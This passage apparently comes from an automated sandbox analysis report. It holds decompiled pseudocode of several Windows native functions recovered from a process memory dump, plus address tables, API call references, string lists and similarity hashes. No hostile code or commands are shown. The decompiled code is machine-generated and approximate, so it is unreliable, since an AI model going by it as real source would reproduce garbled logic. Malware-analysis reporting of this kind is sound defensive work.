									L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E033DBB40(_t257,  &_v68, _t243);
								if(L033A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E033E1370(_t278, 0x3374e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L033B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E033DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E033E1370(_v16, 0x3374e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E033DBB40(_t262,  &_v68, _t244);
								if(L033A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E033E1370(_t282, 0x3374e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E033DBB40(_t262,  &_v68, _t201);
							if(L033A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L033B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E033DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E033E1370(_t280, 0x3374e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E033DBB40(_t267,  &_v68, _t245);
							if(L033A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E033E1370(_t284, 0x3374e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E033DBB40(_t267,  &_v68, _t224);
						if(L033A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x033a3d3c
0x033a3d42
0x033a3d44
0x033a3d46
0x033a3d49
0x033a3d4c
0x033a3d4f
0x033a3d52
0x033a3d55
0x033a3d58
0x033a3d5b
0x033a3d5f
0x033a3d61
0x033a3d66
0x033f8213
0x033f8218
0x033a4085
0x033a4088
0x033a408e
0x033a4094
0x033a409a
0x033a40a0
0x033a40a6
0x033a40a9
0x033a40af
0x033a40b6
0x033a40bd
0x033a40bd
0x033a3d83
0x033f821f
0x033f8229
0x033f8238
0x033f8238
0x033f823d
0x033f823d
0x033a3da0
0x033a3daf
0x033a3db5
0x033a3dba
0x033a3dba
0x033a3dd4
0x033a3e94
0x033a3eab
0x033a3f6d
0x033a3f84
0x033a406b
0x033a406b
0x033a406e
0x033a406e
0x033a4070
0x033a4074
0x033f8351
0x033f8351
0x033a407a
0x033a407f
0x033f835d
0x033f8370
0x033f8377
0x033f8379
0x033f837c
0x033f837c
0x033f835d
0x00000000
0x033a407f
0x033a3f8a
0x033a3f8d
0x033a3f90
0x033a3f95
0x033f830d
0x033f830f
0x033a3f9b
0x033a3fac
0x033a3fae
0x033a3fb1
0x033a3fb1
0x033a3fb6
0x033f8317
0x033f831a
0x00000000
0x033a3fbc
0x033a3fc1
0x033a3fc9
0x033a3fd7
0x033a3fda
0x033a3fdd
0x033a4021
0x033a4021
0x033a4029
0x033a4030
0x033a4044
0x033a4046
0x033a4046
0x033a4044
0x033a4049
0x033f8327
0x033f8334
0x033f8339
0x033f833c
0x033a404f
0x033a404f
0x033a404f
0x033a4051
0x033a4056
0x033a4063
0x033a4063
0x033a4068
0x00000000
0x033a4068
0x033a3fdf
0x033a3fe2
0x033a3fe4
0x033a3fe7
0x033a3fef
0x033a4003
0x033a4005
0x033a4005
0x033a400c
0x033a4013
0x033a4016
0x033a4017
0x033a401b
0x033a401e
0x00000000
0x033a401e
0x033a3fb6
0x033a3eb1
0x033a3eb4
0x033a3eb7
0x033a3ebc
0x033f82a9
0x033f82ab
0x033a3ec2
0x033a3ed3
0x033a3ed5
0x033a3ed8
0x033a3ed8
0x033a3edd
0x033f82b3
0x033f82b6
0x00000000
0x033a3ee3
0x033a3ee8
0x033a3eed
0x033a3ef0
0x033a3ef3
0x033a3f02
0x033a3f05
0x033a3f08
0x033f82c0
0x033f82c3
0x033f82c5
0x033f82c8
0x033f82d0
0x033f82e4
0x033f82e6
0x033f82e6
0x033f82ed
0x033f82f4
0x033f82f7
0x033f82f8
0x033f82fc
0x033f82ff
0x033f82ff
0x033a3f0e
0x033a3f11
0x033a3f16
0x033a3f1d
0x033a3f31
0x033f8307
0x033f8307
0x033a3f31
0x033a3f39
0x033a3f48
0x033a3f4d
0x033a3f50
0x033a3f50
0x033a3f53
0x033a3f58
0x033a3f65
0x033a3f65
0x033a3f6a
0x00000000
0x033a3f6a
0x033a3edd
0x033a3dda
0x033a3ddd
0x033a3de0
0x033a3de5
0x033f8245
0x033a3deb
0x033a3df7
0x033a3dfc
0x033a3dfe
0x033a3e01
0x033a3e01
0x033a3e06
0x033f824d
0x033f824f
0x033f8254
0x00000000
0x033a3e0c
0x033a3e11
0x033a3e16
0x033a3e19
0x033a3e29
0x033a3e2c
0x033a3e2f
0x033f825c
0x033f825f
0x033f8261
0x033f8264
0x033f826c
0x033f8280
0x033f8282
0x033f8282
0x033f8289
0x033f8290
0x033f8293
0x033f8294
0x033f8298
0x033f829b
0x033f829b
0x033a3e35
0x033a3e38
0x033a3e3d
0x033a3e44
0x033a3e58
0x033f82a3
0x033f82a3
0x033a3e58
0x033a3e60
0x033a3e6f
0x033a3e74
0x033a3e77
0x033a3e77
0x033a3e7a
0x033a3e7f
0x033a3e8c
0x033a3e8c
0x033a3e91
0x00000000
0x033a3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 033A3DC0
WindowsExcludedProcs, xrefs: 033A3D6F
Kernel-MUI-Language-Disallowed, xrefs: 033A3E97
Kernel-MUI-Number-Allowed, xrefs: 033A3D8C
Kernel-MUI-Language-SKU, xrefs: 033A3F70

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: d13032c85a870f804c5a4c5722c2795881ceef42f84937e4b1d22f78a477f314
Instruction ID: 9f61833dba5935b5a6c783c97fa6d21451a3883c3691ecda8a62a03701186678
Opcode Fuzzy Hash: d13032c85a870f804c5a4c5722c2795881ceef42f84937e4b1d22f78a477f314
Instruction Fuzzy Hash: 02F15A76D00618EFCB15DF99C9C0AEEFBB9FF48650F15006AE505AB650E774AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0342B8D0, Relevance: 6.2, APIs: 4, Instructions: 199
nativeCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0342B8D0(void* __edx, intOrPtr _a4, void _a8, signed char _a12, void*** _a16) {
				char _v8;
				signed int _v12;
				void* _t80;
				void* _t83;
				intOrPtr _t89;
				void* _t92;
				signed char _t106;
				void** _t107;
				void _t108;
				intOrPtr _t109;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				void** _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3487b9c; // 0x0
				_t124 = L033B4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E033D9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E033D95B0();
									if( *_t107 != 0) {
										NtClose( *_t107);
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L033B77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E033D9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											NtClose( *_t124);
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3487b9c; // 0x0
									_t92 = L033B4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E033D9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0339A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0342E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0342E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E033D95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0342b8d9
0x0342b8e4
0x00000000
0x0342b8e6
0x0342b8f3
0x0342b8f5
0x0342b8f5
0x0342b8f8
0x0342b920
0x0342b924
0x0342b936
0x0342b939
0x0342b93d
0x0342b948
0x0342b9a0
0x0342b9a0
0x0342b9a4
0x0342b9bf
0x0342b9c4
0x0342b9c6
0x0342b9cd
0x0342b9d1
0x0342bad4
0x0342bad8
0x0342bada
0x0342badc
0x0342badc
0x0342badf
0x0342bae0
0x0342bae2
0x0342bae4
0x0342baec
0x0342baf0
0x0342baf0
0x0342baec
0x0342bafb
0x0342bafc
0x0342bafe
0x0342bb01
0x0342bb01
0x00000000
0x0342bb06
0x0342b9d7
0x0342b9db
0x0342b9db
0x0342b9de
0x0342b9de
0x0342b9e4
0x0342b9e7
0x0342b9ea
0x0342b9ec
0x0342b9ef
0x0342b9f3
0x0342ba1b
0x0342ba1b
0x0342ba23
0x0342ba24
0x0342ba27
0x0342ba2a
0x0342ba2b
0x0342ba2e
0x0342ba30
0x0342ba37
0x0342ba3f
0x0342ba9c
0x0342baa2
0x0342bb13
0x0342bb15
0x0342baae
0x0342baae
0x0342bab3
0x0342bab5
0x0342baba
0x0342bac8
0x0342bac8
0x0342baba
0x0342bacf
0x00000000
0x0342bacf
0x0342bb1a
0x00000000
0x0342bb1c
0x0342baa7
0x0342bb11
0x00000000
0x0342bb11
0x0342baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0342ba41
0x0342ba41
0x0342ba41
0x0342ba58
0x0342ba5d
0x0342ba62
0x00000000
0x00000000
0x0342ba64
0x0342ba67
0x0342ba68
0x0342ba69
0x0342ba6c
0x0342ba6f
0x0342ba71
0x0342ba78
0x0342ba80
0x00000000
0x00000000
0x0342ba90
0x0342ba90
0x0342ba97
0x00000000
0x0342ba97
0x0342b9f5
0x0342b9f7
0x0342b9f7
0x0342b9fa
0x0342ba03
0x0342ba07
0x0342ba0c
0x0342ba10
0x0342ba17
0x00000000
0x0342b9f7
0x0342b9a6
0x0342b9a8
0x0342b9af
0x0342b9b3
0x00000000
0x00000000
0x0342b9b9
0x00000000
0x0342b9b9
0x0342b94d
0x0342b98f
0x0342b995
0x0342b999
0x0342b960
0x0342b967
0x0342b968
0x0342b96a
0x00000000
0x0342b96a
0x0342b99b
0x0342b99e
0x00000000
0x00000000
0x00000000
0x0342b99e
0x0342b951
0x0342b954
0x0342b95a
0x0342b95e
0x0342b972
0x0342b979
0x0342b97d
0x0342b97f
0x0342b980
0x0342b982
0x0342b984
0x00000000
0x0342b984
0x00000000
0x0342b926
0x00000000
0x0342b926

APIs

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,000000FF,00000028,00000200,00000000), ref: 0342BACF
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000004,000000FE,00000005,00000004,00000004,000000FF,00000028,00000200,00000000), ref: 0342BAF0

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Close.0000001
String ID:
API String ID: 971714608-0
Opcode ID: add2f0130f0c82c326615edeafec632dcf7bb054d97b8c59ae7402b99824e1d2
Instruction ID: 629ccf017d454a0a4ee58311d5483e9b3a86d89fee922ee08d631ed8c7c1b1b1
Opcode Fuzzy Hash: add2f0130f0c82c326615edeafec632dcf7bb054d97b8c59ae7402b99824e1d2
Instruction Fuzzy Hash: 99711E36600B11AFDB22CF15C880F66BFB5EF40720F59492AE655AF6A0DB71E941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 033952A5, Relevance: 6.2, APIs: 4, Instructions: 161
nativeCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E033952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				intOrPtr* _v40;
				void* _v46;
				void* _v60;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E033AEEF0(0x34879a0);
					_t104 =  *0x3488210; // 0x522b98
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E033AEB70(_t93, 0x34879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E033D9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E033AEEF0(0x34879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E033AEB70(0, 0x34879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x522bb002
								_t13 = _t104 + 0xc; // 0x522ba5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E033CF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E033AEEF0(0x34879a0);
									__eflags =  *0x3488210 - _t104; // 0x522b98
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3488210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000522b
											_t95 =  *((intOrPtr*)( *_t37));
											E03414888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E033AEB70(_t95, 0x34879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											NtClose( *_t38);
											L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 = _v40;
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											NtClose( *_t41);
											L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 = _v40;
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E033AEB70(_t93, 0x34879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										NtClose( *_t25);
										L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 = _v40;
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										NtClose( *_t28);
										L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000522b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x522bb002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E033CF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x033952a5
0x033952ad
0x033952b0
0x033952b3
0x033952b7
0x033952ba
0x033952bf
0x033952c4
0x033952cc
0x00000000
0x00000000
0x033952ce
0x033952d1
0x033952d9
0x033952dd
0x033952e7
0x033952f7
0x033952f9
0x033952fd
0x033f0dcf
0x033f0dd5
0x033f0dd6
0x033f0dd7
0x033f0dd8
0x033f0dd9
0x033f0dde
0x033f0ddf
0x033f0de0
0x033f0de1
0x033f0de2
0x033f0de2
0x033f0de5
0x033f0dea
0x033f0dec
0x033f0f60
0x033f0f64
0x033f0f70
0x033f0f76
0x033f0f79
0x033f0f79
0x00000000
0x033f0f64
0x033f0df2
0x033f0df7
0x033f0e04
0x033f0e04
0x033f0e0d
0x033f0e0d
0x033f0e10
0x033f0e1a
0x033f0e1c
0x033f0e4c
0x033f0e52
0x033f0e61
0x033f0e67
0x033f0e6b
0x033f0e70
0x033f0e76
0x033f0ed7
0x033f0edc
0x033f0ee0
0x033f0ee6
0x033f0eea
0x033f0eed
0x033f0ef0
0x033f0ef3
0x033f0ef6
0x033f0ef9
0x033f0efb
0x033f0efe
0x033f0f01
0x033f0f01
0x033f0f0b
0x033f0f12
0x033f0f16
0x033f0f18
0x033f0f1b
0x033f0f2c
0x033f0f31
0x033f0f31
0x033f0f35
0x033f0f39
0x033f0f3a
0x033f0f3c
0x033f0f3f
0x033f0f50
0x033f0f55
0x033f0f55
0x033f0f59
0x033952eb
0x033952f1
0x033952f1
0x033f0e7d
0x033f0e84
0x033f0e88
0x033f0e8a
0x033f0e8d
0x033f0e9e
0x033f0ea3
0x033f0ea3
0x033f0ea7
0x033f0eaf
0x033f0eb3
0x033f0eb9
0x033f0ebc
0x033f0ecd
0x033f0ecd
0x00000000
0x033f0eb3
0x033f0e1e
0x033f0e21
0x033f0e25
0x033f0e2b
0x033f0e2f
0x033f0e30
0x033f0e3a
0x033f0e3f
0x033f0e41
0x00000000
0x00000000
0x033f0e47
0x00000000
0x033f0e47
0x033f0df9
0x033f0dfe
0x00000000
0x00000000
0x00000000
0x033f0dfe
0x03395303
0x03395307
0x00000000
0x03395309
0x00000000
0x03395309
0x03395307
0x033952e9
0x033952e9
0x00000000
0x033952e9
0x0339530e
0x00000000

APIs

NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(00000000,034879A0,034879A0,034879A0,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,034879A0,034879A0), ref: 033F0E8D
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(FFFFFFFF,034879A0,034879A0,034879A0,00000000,00000000,00000000,00000000,?,00090028,00000000,00000000,00000000,00000000,034879A0,034879A0), ref: 033F0EBC

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001Close.0000001
String ID:
API String ID: 971714608-0
Opcode ID: 3147e06da59d0924107476a8e4f5a2ca3cbb5f93eef1b8fe07d08e3068603210
Instruction ID: 80d413755a5fe18c3624b4cb5dd2a32ed11842c1b84143dd6ce7169057d31a97
Opcode Fuzzy Hash: 3147e06da59d0924107476a8e4f5a2ca3cbb5f93eef1b8fe07d08e3068603210
Instruction Fuzzy Hash: A451DD35545742AFE721EF68CC80B2BBBE8FF44710F14091EE5A58B651E770E884CB92

Uniqueness

Uniqueness Score: -1.00%

Function 034219C8, Relevance: 6.1, APIs: 4, Instructions: 107
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E034219C8(intOrPtr* __ecx, intOrPtr* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				intOrPtr* _v20;
				long _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				long _v44;
				long _v48;
				void* _v52;
				void* _t37;
				intOrPtr* _t47;
				signed int _t49;
				void* _t51;
				intOrPtr* _t54;
				long _t58;

				_t47 = __edx;
				_t54 = __ecx;
				_t49 = 6;
				memset( &_v52, 0, _t49 << 2);
				_v20 = _t54;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t54 != 0) {
					 *_t54 = 0;
				}
				if(_t47 != 0) {
					 *_t47 = 0;
				}
				if(_t54 != 0) {
					if(_t47 != 0) {
						_v52 = 0x18;
						_v48 = 0;
						_v40 = 2;
						_v44 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0x414;
						_v24 = 0;
						_t58 = NtCreateSection( &_v12, 0xf0007,  &_v52,  &_v28, 4, 0x8000000, 0);
						if(_t58 < 0) {
							L11:
							_t51 = _v12;
							_t37 = _v8;
							L12:
							if(_t37 != 0) {
								NtUnmapViewOfSection(0xffffffff, _t37);
								_t51 = _v12;
								_v8 = 0;
							}
							if(_t51 != 0) {
								NtClose(_t51);
							}
							goto L16;
						}
						_t58 = NtMapViewOfSection(_v12, 0xffffffff,  &_v8, 0, 0, 0,  &_v16, 1, 0, 4);
						if(_t58 < 0) {
							goto L11;
						}
						E033DFA60(_v8, 0, 0xf0);
						_t58 = 0;
						 *_v20 = _v12;
						_t51 = 0;
						 *_t47 = _v8;
						_t37 = 0;
						_v12 = 0;
						_v8 = 0;
						goto L12;
					}
					_t58 = 0xc00000f0;
					goto L16;
				} else {
					_t58 = 0xc00000ef;
					L16:
					return _t58;
				}
			}

0x034219d3
0x034219d8
0x034219de
0x034219df
0x034219e3
0x034219e6
0x034219e9
0x034219ec
0x034219f1
0x034219f3
0x034219f3
0x034219f7
0x034219f9
0x034219f9
0x034219fd
0x03421a0b
0x03421a22
0x03421a2d
0x03421a39
0x03421a41
0x03421a44
0x03421a47
0x03421a4a
0x03421a51
0x03421a59
0x03421a5d
0x03421aab
0x03421aab
0x03421aae
0x03421ab1
0x03421ab3
0x03421ab8
0x03421abd
0x03421ac0
0x03421ac0
0x03421ac5
0x03421ac8
0x03421ac8
0x00000000
0x03421ac5
0x03421a79
0x03421a7d
0x00000000
0x00000000
0x03421a88
0x03421a96
0x03421a98
0x03421a9a
0x03421a9f
0x03421aa1
0x03421aa3
0x03421aa6
0x00000000
0x03421aa6
0x03421a0d
0x00000000
0x034219ff
0x034219ff
0x03421ace
0x03421ad5
0x03421ad5

APIs

NtCreateSection.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 03421A54
NtMapViewOfSection.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,00000065,00000000,00000000), ref: 03421A74
NtUnmapViewOfSection.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(000000FF,?,00000065,00000000,00000000), ref: 03421AB8
NtClose.0000001A.00000002.476687065.0000000003370000.00000040.00000001.(?,00000065,00000000,00000000), ref: 03421AC8

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity
